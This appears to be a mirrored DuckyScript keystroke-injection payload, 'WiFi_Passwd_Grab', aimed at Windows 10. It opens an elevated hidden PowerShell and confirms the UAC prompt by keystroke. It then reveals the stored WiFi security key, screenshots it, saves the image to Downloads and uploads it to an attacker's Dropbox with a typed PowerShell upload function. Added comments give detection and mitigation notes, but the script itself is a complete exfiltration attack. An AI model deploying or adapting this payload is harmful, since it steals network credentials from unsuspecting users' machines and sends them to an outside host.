mirror of https://github.com/hak5/omg-payloads.git
REM_BLOCK
|
|
Title: WiFi_Passwd_Grab
|
|
Author: LulzAnarchyAnon
|
|
Description: This is a three-stage payload that begins by navigating to Network
|
|
Description: and Sharing Center. It then opens the wireless properties security
|
|
Description: tab and makes the Network security key visible, finally taking a screenshot.
|
|
Description: In the Second stage the screenshot is saved to the Downloads folder.
|
|
Description: In the Third, and final stage the screenshot is uploaded via Dropbox.
|
|
Target: Windows 10 PowerShell
|
|
Props: Darren Kitchen and I am Jakoby
|
|
Version: 1.0
|
|
Category: Exfiltration
|
|
|
|
This payload may need minor adjustments to run properly depending on
|
|
Attacker, and Target devices.
|
|
|
|
Check out I am Jakoby on Youtube to set up your DropBox for uploads.
|
|
|
|
THIS PAYLOAD IS FOR DEMONSTRATION PURPOSES ONLY, AND NOT INTENDED FOR MISUSE!
|
|
END_REM
|
|
|
|
REM Setup: US keyboard layout, 2000 ms initial wait, then 1000 ms between commands.
REM Reviewer note (defensive): everything below reaches the host as typed keystrokes,
REM so it runs with the rights of whoever is logged on and unlocked at that moment.
DUCKY_LANG US
|
|
DELAY 2000
|
|
DEFAULT_DELAY 1000
|
|
|
|
REM Stage 1
REM Opens the Run dialog and asks for an elevated PowerShell with a hidden window
REM (-verb runas, -windowstyle hidden), then opens Network and Sharing Center.
REM Detection: powershell.exe launched from the Run dialog with -windowstyle hidden
REM and an elevation request is worth alerting on in process-creation telemetry.
|
|
|
|
GUI r
|
|
STRING powershell Start-Process PowerShell -verb runas -windowstyle hidden
|
|
ENTER
|
|
REM ALT Y presumably confirms the UAC consent prompt - TODO confirm.
REM Mitigation: on a standard-user account, or with UAC set to require credentials,
REM the elevation request cannot be confirmed by a single keystroke.
ALT Y
|
|
GUI r
|
|
STRING control.exe /name Microsoft.NetworkAndSharingCenter
|
|
ENTER
|
|
REM The TAB/ENTER/SPACE run below drives the Control Panel UI purely by focus position;
REM per the header it is meant to reach the wireless security tab and reveal the key.
TAB
|
|
ENTER
|
|
TAB
|
|
ENTER
|
|
CTRL TAB
|
|
TAB
|
|
REPEAT 6 SHIFT TAB
|
|
SPACE
|
|
REM PRINTSCREEN puts the screen image on the clipboard; Stage 2 pastes it from there.
PRINTSCREEN
|
|
REPEAT 3 ALT F4
|
|
|
|
REM STAGE 2
REM Pastes the clipboard screenshot into Paint and saves it in the user's Downloads
REM folder under the fixed name "wifipasswd" (extension left to the save dialog).
REM Defensive note: as written, a file with that name appearing in
REM %USERPROFILE%\Downloads is a simple host indicator for this payload.
|
|
|
|
GUI r
|
|
STRINGLN powershell -windowstyle hidden
|
|
STRINGLN mspaint
|
|
CTRL v
|
|
CTRL s
|
|
REM ALT d presumably moves focus to the save dialog's address bar - TODO confirm.
ALT d
|
|
STRINGLN %USERPROFILE%\Downloads
|
|
REPEAT 6 TAB
|
|
STRING wifipasswd
|
|
ALT s
|
|
ALT F4
|
|
|
|
REM STAGE 3
REM Types a PowerShell function, DropBox-Upload, into a console window line by line,
REM then pipes a value into it so the saved screenshot is posted to Dropbox.
REM Defensive notes:
REM  - The upload is an HTTPS POST to content.dropboxapi.com/2/files/upload from a
REM    workstation PowerShell process; proxy or egress logs for that host are a detection point.
REM  - If PowerShell script block logging is enabled, the function text typed below
REM    should be recorded on the host.
REM  - The access token lives in the payload text itself, so a recovered copy of the
REM    payload exposes it and lets the owning account be identified and the token revoked.
|
|
|
|
GUI r
|
|
STRINGLN powershell
|
|
STRINGLN function DropBox-Upload {
|
|
STRINGLN [CmdletBinding()]
|
|
STRINGLN param (
|
|
STRINGLN [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
|
|
STRINGLN [Alias("f")]
|
|
STRINGLN [string]$SourceFilePath
|
|
STRINGLN )
|
|
REM Placeholder for the operator's Dropbox access token (hard-coded credential).
STRINGLN $DropBoxAccessToken = "$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
|
|
STRINGLN "
|
|
REM The remote path is the leaf name of the local file, placed at the Dropbox root.
STRINGLN $outputFile = Split-Path $SourceFilePath -leaf
|
|
STRINGLN $TargetFilePath="/$outputFile"
|
|
STRINGLN $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
|
|
STRINGLN $authorization = "Bearer " + $DropBoxAccessToken
|
|
STRINGLN $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
|
|
STRINGLN $headers.Add("Authorization", $authorization)
|
|
STRINGLN $headers.Add("Dropbox-API-Arg", $arg)
|
|
STRINGLN $headers.Add("Content-Type", 'application/octet-stream')
|
|
STRINGLN Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
|
STRINGLN }
|
|
REM The remaining keystrokes are position-dependent UI navigation; their exact intent
REM is not evident from the listing. Presumably they put the saved file's path on the
REM clipboard so that CTRL v can paste it in front of "| DropBox-Upload" - TODO confirm.
GUI r
|
|
STRINGLN %USERPROFILE%\Downloads\
|
|
STRINGLN wifipasswd
|
|
GUI r
|
|
STRINGLN %USERPROFILE%\Downloads\
|
|
STRINGLN wifipasswd
|
|
ALT h
|
|
REPEAT 5 TAB
|
|
ENTER
|
|
ALT F4
|
|
CTRL v
|
|
STRINGLN | DropBox-Upload
|
|
ENTER
|
|
ALT F4
|
|
ENTER |